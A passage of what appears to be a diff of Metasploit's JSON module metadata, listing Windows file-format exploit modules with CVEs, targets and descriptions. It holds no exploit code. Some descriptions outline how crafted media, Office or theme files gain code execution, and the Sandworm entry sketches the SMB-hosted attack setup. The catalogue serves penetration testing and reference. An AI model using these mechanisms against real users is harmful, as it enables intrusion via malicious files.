This module has been tested successfully on MediaCoder 0.8.21.5539\n to 0.8.22.5530 over Windows XP SP3 and Windows 7 SP0.", - "references": [ - "CVE-2017-8869", - "OSVDB-94522", - "EDB-26403" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MediaCoder 0.8.21 - 0.8.22 / Windows XP SP3 / Windows 7 SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mediacoder_m3u.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mediacoder_m3u", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mediajukebox": { - "name": "Media Jukebox 8.0.400 Buffer Overflow (SEH)", - "fullname": "exploit/windows/fileformat/mediajukebox", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-07-01", - "type": "exploit", - "author": [ - "Ron Henry ", - "dijital1" - ], - "description": "This module exploits a stack buffer overflow in Media Jukebox 8.0.400\n by creating a specially crafted m3u or pls file.", - "references": [ - "OSVDB-55924", - "CVE-2009-2650" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 - English", - "Windows XP SP2 - English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mediajukebox.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mediajukebox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/microp_mppl": { - "name": "MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/microp_mppl", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-08-23", - "type": "exploit", - 
"author": [ - "James Fitts " - ], - "description": "This module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based\n buffer overflow occurs when the content of a .mppl file gets copied onto the stack,\n which overwrites the lpFileName parameter of a CreateFileA() function, and results\n arbitrary code execution under the context of the user.", - "references": [ - "CVE-2010-5299", - "OSVDB-73627", - "EDB-14720" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 / Vista / 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/microp_mppl.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/microp_mppl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/microsoft_windows_contact": { - "name": "Microsoft Windows Contact File Format Arbitary Code Execution", - "fullname": "exploit/windows/fileformat/microsoft_windows_contact", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-01-17", - "type": "exploit", - "author": [ - "John Page (aka hyp3rlinx)", - "Brenner Little" - ], - "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.\n User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of \".contact\" files node param which takes an expected website value, however if an attacker references an\n executable file it will run that instead without warning instead of performing expected web navigation. 
This is dangerous and would be unexpected to an end user.\n Executable files can live in a sub-directory so when the \".contact\" website link is clicked it traverses directories towards the executable and runs.\n Making matters worse is if the files are compressed then downloaded \"mark of the web\" (MOTW) may potentially not work as expected with certain archive utilitys.\n The \".\\\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.\n This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.", - "references": [ - "EDB-46188", - "URL-http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt", - "ZDI-19-013" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2022-12-04 17:41:24 +0000", - "path": "/modules/exploits/windows/fileformat/microsoft_windows_contact.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/microsoft_windows_contact", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/millenium_mp3_pls": { - "name": "Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/millenium_mp3_pls", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-07-30", - "type": "exploit", - "author": [ - "Molotov", - "dookie", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a 
browser, when the PLS extension is registered to Millenium MP3 Studio.\n This functionality has not been tested in this module.", - "references": [ - "OSVDB-56574", - "EDB-9618", - "EDB-10240" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/millenium_mp3_pls.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/millenium_mp3_pls", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mini_stream_pls_bof": { - "name": "Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/mini_stream_pls_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-07-16", - "type": "exploit", - "author": [ - "Madjix", - "Tiago Henriques", - "James Fitts " - ], - "description": "This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3\n Converter v3.1.2.1. 
The overflow is triggered when an unsuspecting victim\n opens the malicious PLS file.", - "references": [ - "CVE-2010-5081", - "OSVDB-78078", - "EDB-14373", - "BID-34514" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Mini-stream RM-MP3 Converter v3.1.2.1.2010.03.30" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mini_stream_pls_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mjm_coreplayer2011_s3m": { - "name": "MJM Core Player 2011 .s3m Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/mjm_coreplayer2011_s3m", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-04-30", - "type": "exploit", - "author": [ - "rick2600", - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow in MJM Core Player 2011\n When opening a malicious s3m file in this application, a stack buffer overflow can be\n triggered, resulting in arbitrary code execution.\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.", - "references": [ - "OSVDB-72101", - "URL-http://www.corelan.be/advisories.php?id=CORELAN-11-004" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal Generic DEP & ASLR Bypass" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mjm_coreplayer2011_s3m", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - 
"exploit_windows/fileformat/mjm_quickplayer_s3m": { - "name": "MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/mjm_quickplayer_s3m", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-04-30", - "type": "exploit", - "author": [ - "rick2600", - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow in MJM QuickPlayer 1.00 beta 60a\n and QuickPlayer 2010 (Multi-target exploit). When opening a malicious s3m file in\n one of these 2 applications, a stack buffer overflow can be triggered, resulting in\n arbitrary code execution.\n\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.", - "references": [ - "OSVDB-72102", - "URL-http://www.corelan.be/advisories.php?id=CORELAN-11-003" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal Generic DEP & ASLR Bypass" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mjm_quickplayer_s3m", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/moxa_mediadbplayback": { - "name": "MOXA MediaDBPlayback ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/fileformat/moxa_mediadbplayback", - "aliases": [], - "rank": 200, - "disclosure_date": "2010-10-19", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. 
When\n sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5)\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2010-4742", - "OSVDB-68986", - "URL-http://www.moxa.com" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/moxa_mediadbplayback", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mplayer_m3u_bof": { - "name": "MPlayer Lite M3U Buffer Overflow", - "fullname": "exploit/windows/fileformat/mplayer_m3u_bof", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-03-19", - "type": "exploit", - "author": [ - "C4SS!0 and h1ch4m", - "Gabor Seljan" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in\n MPlayer Lite r33064, caused by improper bounds checking of an URL entry.\n\n By persuading the victim to open a specially-crafted .M3U file, specifically by\n drag-and-dropping it to the player, a remote attacker can execute arbitrary\n code on the system.", - "references": [ - "BID-46926", - "EDB-17013", - "URL-http://www.mplayer-ww.com/eng/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 (DEP Bypass) / MPlayer Lite r33064" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mplayer_m3u_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, 
- "needs_cleanup": null - }, - "exploit_windows/fileformat/mplayer_sami_bof": { - "name": "MPlayer SAMI Subtitle File Buffer Overflow", - "fullname": "exploit/windows/fileformat/mplayer_sami_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-05-19", - "type": "exploit", - "author": [ - "Jacques Louw", - "juan vazquez " - ], - "description": "This module exploits a stack-based buffer overflow found in the handling\n of SAMI subtitles files in MPlayer SVN Versions before 33471. It currently\n targets SMPlayer 0.6.8, which is distributed with a vulnerable version of MPlayer.\n\n The overflow is triggered when an unsuspecting victim opens a movie file first,\n followed by loading the malicious SAMI subtitles file from the GUI. Or, it can also\n be done from the console with the MPlayer \"-sub\" option.", - "references": [ - "BID-49149", - "OSVDB-74604", - "URL-http://labs.mwrinfosecurity.com/files/Advisories/mwri_mplayer-sami-subtitles_2011-08-12.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "SMPlayer 0.6.8 / mplayer.exe Sherpya-SVN-r29355-4.5.0 / Windows XP English SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mplayer_sami_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mplayer_sami_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms09_067_excel_featheader": { - "name": "MS09-067 Microsoft Excel Malformed FEATHEADER Record Vulnerability", - "fullname": "exploit/windows/fileformat/ms09_067_excel_featheader", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-11-10", - "type": "exploit", - "author": [ - "Sean Larsson", - "jduck " - ], - "description": "This module exploits a vulnerability in the handling of the FEATHEADER record\n by Microsoft Excel. 
Revisions of Office XP and later prior to the release of the\n MS09-067 bulletin are vulnerable.\n\n When processing a FEATHEADER (Shared Feature) record, Microsoft used a data\n structure from the file to calculate a pointer offset without doing proper\n validation. Attacker supplied data is then used to calculate the location of an\n object, and in turn a virtual function call. This results in arbitrary code\n execution.\n\n NOTE: On some versions of Office, the user will need to dismiss a warning dialog\n prior to the payload executing.", - "references": [ - "CVE-2009-3129", - "OSVDB-59860", - "MSB-MS09-067", - "BID-36945", - "ZDI-09-083", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=832" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Office 2002 (XP) SP3 base English on Windows XP SP3 English", - "Microsoft Office 2002 (XP) SP3 w/kb969680 English on Windows XP SP3 English", - "Microsoft Office 2003 SP0 English on Windows XP SP3 English", - "Microsoft Office 2007 SP2 English on Windows XP SP3 English", - "Crash Target for Debugging" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms09_067_excel_featheader", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms10_004_textbytesatom": { - "name": "MS10-004 Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/ms10_004_textbytesatom", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-02-09", - "type": "exploit", - "author": [ - "SkD", - "Snake", - "jduck " - ], - "description": "This module exploits a stack buffer overflow vulnerability in the handling of\n the 
TextBytesAtom records by Microsoft PowerPoint Viewer. According to Microsoft,\n the PowerPoint Viewer distributed with Office 2003 SP3 and earlier, as well as\n Office 2004 for Mac, are vulnerable.\n\n NOTE: The vulnerable code path is not reachable on versions of Windows prior to\n Windows Vista.", - "references": [ - "CVE-2010-0033", - "OSVDB-62241", - "MSB-MS10-004", - "ZDI-10-017" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft PowerPoint Viewer 2003", - "Microsoft PowerPoint Viewer 2003 (kb949041 or kb956500) or Office 2003 SP3", - "Microsoft PowerPoint Viewer 2003 (kb969615)", - "Crash Target for Debugging" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms10_004_textbytesatom", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms10_038_excel_obj_bof": { - "name": "MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow", - "fullname": "exploit/windows/fileformat/ms10_038_excel_obj_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-06-08", - "type": "exploit", - "author": [ - "Nicolas Joly", - "Shahin Ramezany ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP.\n By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker\n can get the control of the execution flow. 
This results in arbitrary code execution under\n the context of the user.", - "references": [ - "CVE-2010-0822", - "OSVDB-65236", - "BID-40520", - "MSB-MS10-038", - "URL-https://www.exploit-db.com/moaub-24-microsoft-excel-obj-record-stack-overflow/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Office Excel 2002 10.2614.2625 Service Pack 0(Office XP) on Windows XP SP3", - "Microsoft Office Excel 2002 10.6501.6626 Service Pack 3 (Office XP SP3) on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms10_038_excel_obj_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms10_087_rtf_pfragments_bof": { - "name": "MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)", - "fullname": "exploit/windows/fileformat/ms10_087_rtf_pfragments_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-11-09", - "type": "exploit", - "author": [ - "wushi of team509", - "unknown", - "jduck ", - "DJ Manila Ice, Vesh, CA" - ], - "description": "This module exploits a stack-based buffer overflow in the handling of the\n 'pFragments' shape property within the Microsoft Word RTF parser. All versions\n of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the\n MS10-087 bulletin are vulnerable.\n\n This module does not attempt to exploit the vulnerability via Microsoft Outlook.\n\n The Microsoft Word RTF parser was only used by default in versions of Microsoft\n Word itself prior to Office 2007. With the release of Office 2007, Microsoft\n began using the Word RTF parser, by default, to handle rich-text messages within\n Outlook as well. 
It was possible to configure Outlook 2003 and earlier to use\n the Microsoft Word engine too, but it was not a default setting.\n\n It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that\n Microsoft will confirm or deny this since Office 2000 has reached its support\n cycle end-of-life.", - "references": [ - "CVE-2010-3333", - "OSVDB-69085", - "MSB-MS10-087", - "BID-44652", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Microsoft Office 2002 SP3 English on Windows XP SP3 English", - "Microsoft Office 2003 SP3 English on Windows XP SP3 English", - "Microsoft Office 2007 SP0 English on Windows XP SP3 English", - "Microsoft Office 2007 SP0 English on Windows Vista SP0 English", - "Microsoft Office 2007 SP0 English on Windows 7 SP0 English", - "Crash Target for Debugging" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms10_087_rtf_pfragments_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms11_006_createsizeddibsection": { - "name": "MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/ms11_006_createsizeddibsection", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-12-15", - "type": "exploit", - "author": [ - "Moti & Xu Hao", - "Yaniv Miron aka Lament of ilhack", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in the handling of thumbnails\n within .MIC files and various Office documents. 
When processing a thumbnail bitmap\n containing a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This\n leads to arbitrary code execution.\n\n In order to trigger the vulnerable code, the folder containing the document must be\n viewed using the \"Thumbnails\" view.", - "references": [ - "CVE-2010-3970", - "OSVDB-70263", - "MSB-MS11-006", - "BID-45662" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 SP0/SP4 English", - "Windows XP SP3 English", - "Crash Target for Debugging" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms11_006_createsizeddibsection", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms11_021_xlb_bof": { - "name": "MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow", - "fullname": "exploit/windows/fileformat/ms11_021_xlb_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-08-09", - "type": "exploit", - "author": [ - "Aniway", - "Unknown", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in Excel of Microsoft Office 2007.\n By supplying a malformed .xlb file, an attacker can control the content (source)\n of a memcpy routine, and the number of bytes to copy, therefore causing a stack-\n based buffer overflow. 
This results in arbitrary code execution under the context of\n the user.", - "references": [ - "CVE-2011-0105", - "OSVDB-71765", - "MSB-MS11-021", - "ZDI-11-121" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Office Excel 2007 on Windows XP", - "Microsoft Office Excel 2007 SP2 on Windows XP" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms11_021_xlb_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms12_005": { - "name": "MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability", - "fullname": "exploit/windows/fileformat/ms12_005", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-01-10", - "type": "exploit", - "author": [ - "Yorick Koster", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Microsoft Office's ClickOnce\n feature. When handling a Macro document, the application fails to recognize\n certain file extensions as dangerous executables, which can be used to bypass\n the warning message. 
This can allow attackers to trick victims into opening the\n malicious document, which will load up either a python or ruby payload, and\n finally, download and execute an executable.", - "references": [ - "CVE-2012-0013", - "OSVDB-78207", - "MSB-MS12-005", - "BID-51284", - "URL-http://support.microsoft.com/default.aspx?scid=kb;EN-US;2584146", - "URL-http://exploitshop.wordpress.com/2012/01/14/ms12-005-embedded-object-package-allow-arbitrary-code-execution/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Office Word 2007/2010 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms12_005.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms12_005", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms12_027_mscomctl_bof": { - "name": "MS12-027 MSCOMCTL ActiveX Buffer Overflow", - "fullname": "exploit/windows/fileformat/ms12_027_mscomctl_bof", - "aliases": [], - "rank": 200, - "disclosure_date": "2012-04-10", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious\n RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited\n in the wild on April 2012.\n\n This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office\n 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. 
This chain uses\n \"msgr3en.dll\", which will load after office got load, so the malicious file must\n be loaded through \"File / Open\" to achieve exploitation.", - "references": [ - "CVE-2012-0158", - "OSVDB-81125", - "BID-52911", - "MSB-MS12-027", - "URL-http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English", - "Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms12_027_mscomctl_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms13_071_theme": { - "name": "MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution", - "fullname": "exploit/windows/fileformat/ms13_071_theme", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-09-10", - "type": "exploit", - "author": [ - "Eduardo Prado", - "juan vazquez ", - "Matthew Hall " - ], - "description": "This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows\n 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot]\n section. An arbitrary path can be used as screen saver, including a remote SMB resource,\n which allows for remote code execution when a malicious .theme file is opened, and the\n \"Screen Saver\" tab is viewed. 
The code execution is also triggered if the victim installs\n the malicious theme and stays away from the computer, when Windows tries to display the\n screensaver.", - "references": [ - "CVE-2013-0810", - "OSVDB-97136", - "MSB-MS13-071", - "BID-62176", - "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=1040", - "URL-https://www.rapid7.com/blog/post/2013/09/25/change-the-theme-get-a-shell" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 / Windows 2003 SP2" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/fileformat/ms13_071_theme.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms13_071_theme", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms14_017_rtf": { - "name": "MS14-017 Microsoft Word RTF Object Confusion", - "fullname": "exploit/windows/fileformat/ms14_017_rtf", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-04-01", - "type": "exploit", - "author": [ - "Haifei Li", - "Spencer McIntyre", - "unknown" - ], - "description": "This module creates a malicious RTF file that when opened in\n vulnerable versions of Microsoft Word will lead to code execution.\n The flaw exists in how a listoverridecount field can be modified\n to treat one structure as another.\n\n This bug was originally seen being exploited in the wild starting\n in April 2014. 
This module was created by reversing a public\n malware sample.", - "references": [ - "CVE-2014-1761", - "MSB-MS14-017", - "URL-http://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers", - "URL-https://www.virustotal.com/en/file/e378eef9f4ea1511aa5e368cb0e52a8a68995000b8b1e6207717d9ed09e8555a/analysis/" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Office 2010 SP2 English on Windows 7 SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms14_017_rtf.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms14_017_rtf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "screen-effects" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms14_060_sandworm": { - "name": "MS14-060 Microsoft Windows OLE Package Manager Code Execution", - "fullname": "exploit/windows/fileformat/ms14_060_sandworm", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-10-14", - "type": "exploit", - "author": [ - "Unknown", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)\n allowing arbitrary code execution, publicly known as \"Sandworm\". Platforms such as Windows\n Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be\n vulnerable. However, based on our testing, the most reliable setup is on Windows platforms\n running Office 2013 and Office 2010 SP2. 
And please keep in mind that some other setups such\n as using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to\n a failure in the CPackage::CreateTempFileName function.\n\n This module will generate three files: an INF, a GIF, and a PPSX file. You are required to\n set up a SMB or Samba 3 server and host the INF and GIF there. Systems such as Ubuntu or an\n older version of Windows (such as XP) work best for this because they require little\n configuration to get going. The PPSX file is what you should send to your target.\n\n In detail, the vulnerability has to do with how the Object Packager 2 component\n (packager.dll) handles an INF file that contains malicious registry changes, which may be\n leveraged for code execution. First of all, Packager does not load the INF file directly.\n As an attacker, you can trick it to load your INF anyway by embedding the file path as\n a remote share in an OLE object. The packager will then treat it as a type of media file,\n and load it with the packager!CPackage::OLE2MPlayerReadFromStream function, which will\n download it with a CopyFileW call, save it in a temp folder, and pass that information for\n later. The exploit will do this loading process twice: first for a fake gif file that's\n actually the payload, and the second for the INF file.\n\n The packager will also look at each OLE object's XML Presentation Command, specifically the\n type and cmd property. In the exploit, \"verb\" media command type is used, and this triggers\n the packager!CPackage::DoVerb function. Also, \"-3\" is used as the fake gif file's cmd\n property, and \"3\" is used for the INF. When the cmd is \"-3\", DoVerb will bail. 
